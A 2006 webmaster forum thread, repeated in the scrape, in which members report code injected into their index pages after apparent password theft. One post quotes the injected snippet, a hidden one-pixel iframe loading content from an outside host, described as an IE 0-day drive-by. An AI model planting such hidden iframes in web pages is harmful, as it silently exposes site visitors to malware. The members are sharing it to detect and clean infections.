ALERT - New Exploits Appearing Today - Check Now

Linkster · 2006-04-21, 01:09 PM

I first noticed that code had been added to two of my index pages this morning and it looked like my password for my server was compromised.

Just now I saw the same exploit on another members index page here - and he's removing it but its exactly the same - different host - but looks like someone has a list of usernames/passwords from a program or something that might match your server passwords (something that I forgot to change)

Im surfing a few of the LLs I know but havent seen it other than one other persons and they are fixing now

Boogie · 2006-04-21, 01:30 PM

The other person was me, it was on boogie-blog.com

it has now been fixed, at least temporarily. I am hoping it stays fixed. trying to get m3server to respond aint the fastest thing in the world...

checking my other sites for it, thankfully nowhere found yet.

RawAlex · 2006-04-21, 01:32 PM

What is the nature of the exploit? Are we taking iframe toolbar installs or something worse?

Alex

Boogie · 2006-04-21, 01:36 PM

i couldnt tell what the script was supposed to intstall, was a simple javascript code on my blog. its gone now so i cant even paste it here so you can figure out what it did

cd34 · 2006-04-21, 02:05 PM

this was the code from earlier. Appears to be a new 0-day exploit in IE using XMLHTTP

9div style="visibility:hidden">9iframe src="http://dnv-counter.com/trf/" width=1 height=1>9/iframe>9/div>

2006-04-21, 01:09 PM	#1
Linkster NO! Im not a female - but being a dragon, I do eat them. Join Date: Mar 2003 Location: Sex Delta Posts: 5,084	ALERT - New Exploits Appearing Today - Check Now I first noticed that code had been added to two of my index pages this morning and it looked like my password for my server was compromised. Just now I saw the same exploit on another members index page here - and he's removing it but its exactly the same - different host - but looks like someone has a list of usernames/passwords from a program or something that might match your server passwords (something that I forgot to change) Im surfing a few of the LLs I know but havent seen it other than one other persons and they are fixing now __________________ Pussy Chompers Porn Links NSCash

2006-04-21, 01:30 PM	#2
Boogie I like to blog :) Join Date: Sep 2003 Posts: 1,050	The other person was me, it was on boogie-blog.com it has now been fixed, at least temporarily. I am hoping it stays fixed. trying to get m3server to respond aint the fastest thing in the world... checking my other sites for it, thankfully nowhere found yet. __________________ I got a porn blog! Got a blog worth linking to? Contact me

2006-04-21, 01:36 PM	#4
Boogie I like to blog :) Join Date: Sep 2003 Posts: 1,050	i couldnt tell what the script was supposed to intstall, was a simple javascript code on my blog. its gone now so i cant even paste it here so you can figure out what it did __________________ I got a porn blog! Got a blog worth linking to? Contact me

2006-04-21, 02:05 PM	#5
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	this was the code from earlier. Appears to be a new 0-day exploit in IE using XMLHTTP 9div style="visibility:hidden">9iframe src="http://dnv-counter.com/trf/" width=1 height=1>9/iframe>9/div> __________________ SnapReplay.com a different way to share photos - iPhone & Android

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread:

2006-04-21, 01:32 PM	#3
RawAlex Took the hint. Join Date: Mar 2003 Posts: 5,597	What is the nature of the exploit? Are we taking iframe toolbar installs or something worse? Alex